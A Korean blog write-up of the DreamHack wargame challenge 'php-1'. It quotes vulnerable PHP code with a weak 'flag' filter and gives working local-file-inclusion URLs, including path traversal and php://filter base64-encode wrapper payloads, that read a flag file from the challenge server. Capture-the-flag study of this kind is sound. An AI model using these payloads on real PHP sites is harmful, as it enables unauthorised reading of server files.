[DreamHack] 드림핵 웹해킹 php-1

https://dreamhack.io/wargame/challenges/46

php-1

 

문제설명

php로 작성된 Back Office 서비스입니다.

LFI 취약점을 이용해 플래그를 획득하세요. 플래그는 /var/www/uploads/flag.php에 있습니다.

 

<h2>View</h2>
<pre><?php
    $file = $_GET['file']?$_GET['file']:'';
    if(preg_match('/flag|:/i', $file)){
        exit('Permission denied');
    }
    echo file_get_contents($file);
?>
</pre>

 

파일이 여러개 있긴 하지만..!

힌트가 되는 코드는 view.php 이다

 

풀이

php로 만들어진 사이트는 LFI 로 접근 가능하다

 

https://opentutorials.org/module/4291/26819

LFI(2) - with php wrapper - WEB1

 

간단히 요약하면 php 로 만들어진 사이트는

{url}?page=view&file={경로}

의 형태로 해당 경로에 있는 파일을 로드하게 된다

 

http://host3.dreamhack.games:20052/?page=view&file=../uploads/flag.php

 

다만 최소한의 보안장치는 되어있다

    if(preg_match('/flag|:/i', $file)){
        exit('Permission denied');
    }
    echo file_get_contents($file);

 

preg_match 패턴이 일치하는지를 따지기 때문에 "flag" 라는 단어가 포함되기만 하면 

대문자 소문자 상관없이 (i가 그 역할)

Permission denied 가 뜨는것..

 

이제 위에 언급한 lfi 를 이용하자

 

강의에 나와있는대로

http://host3.dreamhack.games:23763/?page=php://filter/read=string.toupper/resource=/var/www/uploads/flag

를 입력해서 접속했더니

CAN YOU SEE $FLAG 만 나온다

 

이번엔 위 링크에 나와있는대로

http://host3.dreamhack.games:23763/?page=php://filter/convert.base64-encode/resource=/var/www/uploads/flag

를 입력해보자

 

base64로 인코딩된 코드가 나왔다

 

https://www.base64decode.org/

Base64 Decode and Encode - Online

 

해석해보자

 

 

끝